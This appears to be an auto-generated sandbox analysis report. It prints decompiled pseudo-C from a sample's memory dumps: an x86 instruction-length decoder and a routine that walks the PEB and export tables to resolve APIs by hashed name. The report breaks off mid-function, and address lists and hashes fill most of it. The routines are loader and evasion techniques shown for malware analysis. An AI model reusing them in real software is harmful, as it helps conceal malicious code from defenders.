Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction ID: baea5a9a5c9562276d2559cd3bdbdaa6cf48045935b91d60c3d7e93746831513
Opcode Fuzzy Hash: 887c76f87bbc27c21a0e4e06ab69dcb1896b64349bb8a5a860253b88d9d2ec0d
Instruction Fuzzy Hash: 52126F756083049FD714DF28C980B6EB7E9FF95749F104A2EE999872A0DB70EC05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6F039348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F039348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6F033670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6f03934f
0x6f039353
0x6f03935f
0x6f039363
0x6f039367
0x6f03936c
0x6f03936f
0x6f039371
0x6f039373
0x6f039373
0x6f039376
0x6f03937c
0x6f0393f4
0x6f0393f8
0x6f0393fb
0x6f0393fb
0x6f0393fe
0x00000000
0x6f0393fe
0x6f039383
0x6f0393eb
0x6f0393ef
0x00000000
0x6f0393ef
0x6f03938a
0x6f0393e3
0x6f0393e6
0x00000000
0x6f0393e6
0x6f03938f
0x6f0393cd
0x6f0393d4
0x6f0393d7
0x6f0393a0
0x6f0393a0
0x6f0393a6
0x00000000
0x00000000
0x6f0393ab
0x6f0393c5
0x6f0393c8
0x00000000
0x6f0393c8
0x6f0393b0
0x00000000
0x6f0393b2
0x6f0393b6
0x6f0393b9
0x00000000
0x6f0393b9
0x6f0393b0
0x6f039401
0x6f039401
0x6f039401
0x6f03940a
0x6f039413
0x6f039416
0x6f039419
0x6f03941c
0x6f03941f
0x6f039425
0x6f039467
0x6f03946a
0x6f03946b
0x6f039472
0x6f039475
0x6f039427
0x6f03942b
0x6f039435
0x6f03943c
0x6f03943e
0x6f039457
0x6f03945a
0x6f03945a
0x6f03943c
0x6f03947d
0x6f039480
0x6f039483
0x6f039487
0x6f03948b
0x6f039495
0x6f039499
0x6f0394a3
0x6f0394ac
0x6f0394b9
0x6f0394bc
0x6f0394bf
0x6f0394bf
0x6f0394cb
0x6f0394d6
0x6f0394dc
0x6f0394e0
0x6f0394cd
0x6f0394cd
0x6f0394cd
0x6f0394e8
0x6f039512
0x6f039518
0x6f039518
0x6f039520
0x6f0398c9
0x6f0398cf
0x6f0398d5
0x6f0398d5
0x00000000
0x6f039526
0x6f039526
0x6f03952a
0x6f03952d
0x6f039530
0x6f039533
0x6f039537
0x6f039539
0x6f03953c
0x6f03953f
0x6f039543
0x6f039548
0x6f03954b
0x6f03954f
0x6f039554
0x6f039557
0x6f039559
0x6f03955c
0x6f039560
0x6f039565
0x6f039575
0x6f03957b
0x6f03957b
0x6f039583
0x6f039585
0x6f03958e
0x6f039590
0x6f039593
0x6f03959e
0x6f0395cb
0x6f0395a0
0x6f0395b7
0x6f0395b7
0x6f0395d3
0x6f0395d9
0x6f0395df
0x6f0395df
0x6f0395d3
0x6f03958e
0x6f0395e6
0x6f039657
0x6f03965c
0x6f0396b5
0x6f039777
0x6f03977c
0x6f03978b
0x6f039791
0x6f039795
0x6f03979e
0x6f0397a5
0x6f0397ae
0x6f0397bc
0x6f0397bf
0x6f0397a7
0x6f0397a7
0x6f0397a7
0x6f0397a5
0x6f0397c8
0x6f0397f5
0x6f039808
0x6f039810
0x6f0397f7
0x6f0397f9
0x6f039801
0x6f039801
0x6f0397ca
0x6f0397cf
0x6f0397ee
0x6f0397d1
0x6f0397d6
0x6f0397e7
0x6f0397d8
0x6f0397d8
0x6f0397d8
0x6f0397d6
0x6f0397cf
0x6f039818
0x6f039827
0x6f039834
0x6f03983d
0x6f039841
0x6f039845
0x6f039848
0x6f03984b
0x6f03984e
0x6f039851
0x6f039854
0x6f03985a
0x6f03985e
0x6f039864
0x6f039864
0x6f03985a
0x6f03986a
0x6f0398a7
0x6f0398ab
0x6f0398b2
0x6f0398b8
0x6f03986c
0x6f03986f
0x6f03988f
0x6f039893
0x6f03989a
0x6f0398a1
0x6f039871
0x6f039874
0x6f039876
0x6f03987a
0x6f039884
0x6f03988a
0x6f03988a
0x6f039874
0x6f03986f
0x6f0398bf
0x6f0398bf
0x6f0398d8
0x6f0398d8
0x6f0398de
0x6f0398e3
0x6f03993d
0x6f039942
0x6f039981
0x6f039986
0x6f039988
0x6f03998c
0x6f03998f
0x6f039992
0x6f039994
0x6f039995
0x6f039995
0x6f03999a
0x6f0399b8
0x6f0399ba
0x6f0399be
0x6f0399c4
0x6f0399c7
0x6f0399c9
0x6f0399ca
0x6f0399ca
0x00000000
0x6f03999c
0x6f03999c
0x6f03999c
0x6f0399a0
0x6f0399a6
0x6f0399a9
0x6f0399ab
0x6f0399ae
0x6f0399cd
0x6f0399cd
0x6f0399d4
0x6f0399ee
0x6f0399d6
0x6f0399d6
0x6f0399e2
0x6f0399e3
0x6f0399e6
0x6f0399e6
0x6f0399fc
0x6f0399fc
0x6f03999a
0x6f039947
0x6f039955
0x6f03996d
0x6f039971
0x6f039974
0x6f03997a
0x6f03997e
0x6f03997e
0x00000000
0x6f03997e
0x6f039957
0x6f03995b
0x6f039961
0x6f039961
0x6f039967
0x00000000
0x6f039967
0x6f039949
0x6f03994d
0x00000000
0x6f03994d
0x6f0398e7
0x6f039913
0x6f03992b
0x6f03992f
0x6f039932
0x6f039935
0x6f039937
0x6f03993a
0x6f039915
0x6f039915
0x6f039919
0x6f03991c
0x6f03991f
0x6f039922
0x6f039925
0x6f039925
0x00000000
0x6f039913
0x6f0398ed
0x00000000
0x00000000
0x6f0398f3
0x6f0398f7
0x6f0398fd
0x6f039900
0x6f039903
0x6f039906
0x00000000
0x6f039906
0x6f03977e
0x6f039782
0x6f039788
0x00000000
0x6f039788
0x6f0396c0
0x6f0396d2
0x6f0396d7
0x6f039742
0x00000000
0x00000000
0x6f039749
0x6f03976f
0x6f039773
0x00000000
0x00000000
0x6f039752
0x6f039757
0x6f03976b
0x00000000
0x00000000
0x00000000
0x6f03976d
0x6f03975e
0x00000000
0x00000000
0x6f039763
0x00000000
0x00000000
0x6f039765
0x00000000
0x6f039749
0x6f0396d9
0x6f0396e3
0x6f0396f4
0x6f0396f7
0x6f0396fa
0x6f039700
0x00000000
0x00000000
0x00000000
0x00000000
0x6f039706
0x6f039706
0x6f039706
0x6f03970d
0x00000000
0x00000000
0x6f03970f
0x6f039712
0x6f039718
0x00000000
0x00000000
0x00000000
0x6f03971a
0x6f03971c
0x6f039725
0x00000000
0x00000000
0x6f039739
0x00000000
0x00000000
0x00000000
0x6f03973b
0x6f0396c7
0x00000000
0x00000000
0x00000000
0x6f0396cd
0x6f039661
0x6f039690
0x6f039691
0x6f03969a
0x00000000
0x6f0396ab
0x00000000
0x6f0396ab
0x6f039668
0x6f03966b
0x6f03967e
0x6f03967f
0x6f039683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f03966b
0x6f039661
0x6f0395ed
0x6f03964a
0x6f03964e
0x6f039654
0x00000000
0x6f039654
0x6f0395ef
0x6f0395f3
0x6f039600
0x6f039604
0x6f03961a
0x6f039622
0x6f039606
0x6f039608
0x6f039612
0x6f039612
0x6f039628
0x6f039631
0x6f039648
0x00000000
0x00000000
0x00000000
0x6f039648
0x6f039633
0x6f039633
0x00000000
0x6f039628

Strings

, xrefs: 6F0399B3

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: cb30903a0be5ad58a01726dc0b8437165585a0f3b00e7d223226fe830d7e1d14
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: 6E22D972C0C366CBD714CF15C49136ABBE2BF86300F04896EE9E54B299DB35E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F031460, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6F031460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6F030328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6f03d208 == 0 ||  *0x6f03d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6F034FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6f03d2ec |  *0x6f03d2ed;
									if(( *0x6f03d2ec |  *0x6f03d2ed) == 0) {
										_t525 =  *0x6f03d208; // 0x47105a8
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6f03d2ec = 1;
											_t526 = E6F0335F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6F031C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6f03d208 = _t526;
											 *0x6f03d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6F0335F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6F031C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6F02DFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6F02DFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t208 = _t525 + 0x1c0; // 0x471b878
										_t257 =  *_t208;
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x6f03d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x6f03d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6F02E8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6F033044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6f03d2e4 = 1;
					E6F02F5A8( &(_t535[0x38]), 0);
					E6F02F5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6F02F4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6F033044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
